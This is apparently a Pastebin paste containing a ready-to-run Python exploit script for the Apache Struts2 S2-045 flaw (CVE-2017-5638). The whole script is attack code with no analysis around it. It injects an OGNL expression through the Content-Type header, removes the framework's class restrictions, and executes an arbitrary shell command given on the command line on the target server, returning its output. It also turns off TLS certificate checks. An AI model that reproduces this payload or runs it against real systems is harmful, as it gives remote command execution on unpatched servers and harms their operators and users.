SHARE
TWEET

securityattack_apache_struts_PoC

a guest Mar 9th, 2017 307 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import urllib2
  5. import requests
  6. import httplib
  7.  
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  9.  
  10. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  11.  
  12. #uso: python script.py <url> "<command>"
  13.  
  14. def exploit(url, cmd):
  15.     payload = "Content-Type:%{(#_='multipart/form-data')."
  16.     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
  17.     payload += "(#_memberAccess?"
  18.     payload += "(#_memberAccess=#dm):"
  19.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
  20.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
  21.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
  22.     payload += "(#ognlUtil.getExcludedClasses().clear())."
  23.     payload += "(#context.setMemberAccess(#dm))))."
  24.     payload += "(#cmd='%s')." % cmd
  25.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
  26.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
  27.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
  28.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
  29.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
  30.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
  31.     payload += "(#ros.flush())}"
  32.  
  33.     try:
  34.  
  35.         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
  36.         #request = urllib2.Request(url, headers=headers)
  37.         request = requests.get(url, headers=headers,verify=False)
  38.         #page = urllib2.urlopen(request).read()
  39.  
  40.     except httplib.IncompleteRead, e:
  41.  
  42.         request = e.partial
  43.  
  44.     print(request.text)
  45.  
  46.     return request
  47.  
  48. if __name__ == '__main__':
  49.  
  50.     import sys
  51.     if len(sys.argv) != 3:
  52.         print("[*] struts2_S2-045.py <url> <cmd>")
  53.  
  54.     else:
  55.  
  56.         print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
  57.         url = sys.argv[1]
  58.         cmd = sys.argv[2]
  59.         print("[*] cmd: %s\n" % cmd)
  60.  
  61.         exploit(url, cmd)
RAW Paste Data
Top